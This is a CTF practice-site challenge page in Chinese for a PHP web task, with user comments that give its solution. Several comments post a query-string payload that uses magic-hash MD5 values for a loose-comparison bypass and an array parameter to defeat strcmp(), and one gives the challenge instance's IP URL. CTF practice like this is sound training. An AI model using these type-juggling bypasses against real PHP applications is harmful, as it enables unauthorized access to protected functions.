前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 5070
提  示:
描  述:
来源 山科大ctf
评论
lordinglord 6天前

http://117.72.52.127:19197/index.php?v1=QNKCDZO&v2=240610708&v3[]=a

回复 0

emm不取名字了 17天前

flag{*****}

回复 0

3344 1月前

flag{**********}

回复 0

Arya32f 1月前

/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1

回复 0

HK1ng 1月前

首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。

回复 1

goodsnack 1月前

弱类型比较,传数组即可

回复 0

harven 2月前

http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test

回复 0

smtall 2月前

用deepseek做出来了

回复 2

大棕兔爸爸 3月前

存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc

回复 1

welltian 5月前

/?v1=QNKCDZO&v2=240610708&v3[]=123

回复 0

WriteUp

image
harry

3 金币

评分(11)

解题动态

xiayuan 攻破了该题 9小时前
Rookieeeee 攻破了该题 18小时前
卡卡罗特M 攻破了该题 20小时前
zhuzhu90 攻破了该题 23小时前
bugtest 攻破了该题 23小时前
神级菜鸟 攻破了该题 1天前
hkxr 攻破了该题 1天前
翻斗花园突破手 攻破了该题 1天前
yutou 攻破了该题 1天前
asdaosidasu 攻破了该题 1天前
15874086973 攻破了该题 2天前
18803687092 攻破了该题 2天前
YXW3 攻破了该题 2天前
蟹堡王第一厨师长 攻破了该题 2天前
2424291140 攻破了该题 2天前
17766114927 攻破了该题 2天前
jiubanyipeng 攻破了该题 2天前
laitya1 攻破了该题 3天前
2023201436 攻破了该题 3天前
kaill 攻破了该题 3天前
问题反馈